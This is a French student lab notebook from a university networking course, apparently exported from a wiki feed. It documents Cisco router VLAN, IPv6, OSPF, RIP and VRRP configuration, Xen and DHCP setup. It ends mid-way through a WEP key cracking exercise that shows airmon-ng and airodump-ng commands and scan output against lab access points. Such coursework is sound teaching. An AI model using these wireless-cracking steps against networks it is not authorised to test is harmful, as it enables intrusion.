64 bytes from 10.60.6.6: icmp_seq=1 ttl=63 time=8.03 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=2 ttl=63 time=13.2 ms&lt;br /&gt;
64 bytes from 10.60.6.6: icmp_seq=3 ttl=63 time=3.42 ms&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
====Travail réalisé la 9e séance====&lt;br /&gt;
=====Serveur DHCP=====&lt;br /&gt;
Nous avons installé le paquet '''isc-dhcp-server'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous avons modifié le fichier de configuration du serveur DHCP''' /etc/dhcp/dhcpd.conf''':&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;option domain-name &amp;quot;speedflash.space&amp;quot;;&lt;br /&gt;
option domain-name-servers 193.48.57.165;&lt;br /&gt;
&lt;br /&gt;
subnet 10.60.6.0 netmask 255.255.255.0 {&lt;br /&gt;
      range 10.60.6.10 10.60.6.40;&lt;br /&gt;
      option routers 10.60.6.1;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite modifié le fichier '''/etc/default/isc-dhcp-server''' pour y ajouter wlan0 comme interface à prendre en compte.&lt;br /&gt;
Nous avons redémarré le serveur en lançant service isc-dhcp-server restart.&amp;lt;br /&amp;gt;&lt;br /&gt;
En se connectant avec un smartphone en DHCP, nous arrivons à avoir une adresse IP (photo à ajouter !!), et nous arrivons à la pinger depuis la machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:~# ping 10.60.6.10&lt;br /&gt;
PING 10.60.6.10 (10.60.6.10) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=1 ttl=63 time=81.8 ms&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=2 ttl=63 time=132 ms&lt;br /&gt;
64 bytes from 10.60.6.10: icmp_seq=3 ttl=63 time=69.4 ms&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35890</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35890"/>
				<updated>2016-12-12T09:57:40Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | RAID5 - Cryptage de données&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (additionnel - 7-8/12/2016)&lt;br /&gt;
 | Modification configuration routeur pour prise en charge Wifi - Sécurisation Wifi par WPA-EAP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 9 (12/12)&lt;br /&gt;
 | Configuration DHCP - PCBX&lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère séance ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e et 3e séance (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e séance====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 5e séance====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Craquage de clé WEP=====&lt;br /&gt;
On bascule d’abord la carte en mode monitor : &lt;br /&gt;
&amp;lt;pre&amp;gt; airmon-ng start xxxxxxxx  &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite on scan tous les réseaux wifi captés par cette même carte :&lt;br /&gt;
&amp;lt;pre&amp;gt; airodump-ng –encrypt wep wlan 0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient :&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
 CH 13 ][ Elapsed: 4 s ][ 2016-03-08 10:32                                         &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 44:AD:D9:5F:87:00  -44        2        0    0  11  54e. WEP  WEP         Wolverine                               &lt;br /&gt;
 04:DA:D2:9C:50:53  -66        2        0    0  13  54e. WEP  WEP         cracotte04                              &lt;br /&gt;
 04:DA:D2:9C:50:55  -70        2       91   35  13  54e. WEP  WEP         cracotte06                              &lt;br /&gt;
 04:DA:D2:9C:50:51  -69        4       33   13  13  54e. WEP  WEP         cracotte02                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -67        3       44   19  13  54e. WEP  WEP         cracotte08                              &lt;br /&gt;
 04:DA:D2:9C:50:56  -69        2       38   11  13  54e. WEP  WEP         cracotte07                              &lt;br /&gt;
 04:DA:D2:9C:50:54  -68        2       37   14  13  54e. WEP  WEP         cracotte05                              &lt;br /&gt;
 04:DA:D2:9C:50:58  -70        2      175   70  13  54e. WEP  WEP         cracotte09                              &lt;br /&gt;
 04:DA:D2:9C:50:50  -68        0      142   52  13  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -70        2      171   64  13  54e. WEP  WEP         cracotte03                              &lt;br /&gt;
                                                                                                                  &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                         &lt;br /&gt;
                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 - 9e  1160       50                                                &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -62    0 -48e    34        7                                                &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -64    0 - 6e    31        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -66    0 -48e    60        6                                                &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -70    0 -24e    52       11                                                &lt;br /&gt;
 04:DA:D2:9C:50:58  00:0F:B5:92:23:69  -62    0 -48e    12      140  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ici nous avons choisi cracotte06 comme wifi cible. On récupère donc son BSSID : 04 :DA :D2 :9C :50 :55 sur le channel 13&amp;lt;br /&amp;gt;&lt;br /&gt;
On surveille uniquement notre cible pour s'assurer qu'une machine s'y connecte bien :&lt;br /&gt;
